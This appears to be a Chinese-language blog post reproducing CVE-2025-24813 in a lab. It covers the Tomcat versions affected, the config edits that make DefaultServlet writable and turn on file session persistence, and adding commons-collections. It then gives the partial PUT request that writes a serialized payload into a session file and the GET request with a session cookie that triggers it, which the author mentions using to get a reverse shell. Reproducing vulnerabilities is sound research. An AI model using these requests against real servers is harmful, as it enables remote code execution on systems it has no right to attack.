参考

奇安信攻防社区-全网首发！CVE-2025-24813 Tomcat 最新 RCE 分析复现 (butian.net)

漏洞影响范围

9.0.0.M1 <= tomcat <= 9.0.98
10.1.0-M1 <= tomcat <= 10.1.34
11.0.0-M1 <= tomcat <= 11.0.2

利用条件

应用程序启用了DefaultServlet写入功能，该功能默认关闭
应用支持了 partial PUT 请求，能够将恶意的序列化数据写入到会话文件中，该功能默认开启
应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置，需要额外配置
应用中包含一个存在反序列化漏洞的库，比如存在于类路径下的 commons-collections，此条件取决于业务实现是否依赖存在反序列化利用链的库

环境搭建

下载源码

提供一下下载地址

Apache Archive Distribution Directory

修改配置

conf/web.xml

修改web.xml

找到default 然后修改为下面这样

<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

直接通过搜索default 的方式进行找到这个

这个的意思就是，将可读变成false

web/context.xml

在文件最后修改成这样

<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>

    <!-- Default set of monitored resources. If one of these changes, the    -->
    <!-- web application will be reloaded.                                   -->
    <WatchedResource>WEB-INF/web.xml</WatchedResource>
    <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
    <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>

    <!-- Uncomment this to disable session persistence across Tomcat restarts -->
    <!--
    <Manager pathname="" />
    -->

    <Manager className="org.apache.catalina.session.PersistentManager">
        <Store className="org.apache.catalina.session.FileStore"/>
    </Manager>
</Context>

下载cc 库

Commons Collections 3.2.1.jar

Maven Repository: commons-collections » commons-collections » 3.2.1 (mvnrepository.com)

然后获得了一个jar

然后放入webapps/ROOT/WEB-INF/lib/commons-collections-3.2.1.jar

需要创建一个lib 文件夹

启动

就启动成功了

制作payload

这里使用yakie 进行

因为bp 发包的时候不能自动解码base64

我尝试的是反弹shell

生成base64

复现

java 版本52 是一个java 8

替换请求包

PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}

添加第二个包

1
2
3

GET / HTTP/1.1  
Host: 127.0.0.1:8080  
Cookie: JSESSIONID=.xxxxx

发送第一个包

会上传一个文件

work/Catalina/localhost/ROOT/.au9u5t.session

Au9u5t 是我替换了xxxx 之后的文件

就复现成功了

#漏洞复现

CVE-2025-24813

https://tsy244.github.io/2025/03/15/漏洞复现/CVE-2025-24813/

Author

August Rosenberg

Posted on

March 15, 2025

Licensed under

基础免杀学习记录 Previous

byovd Next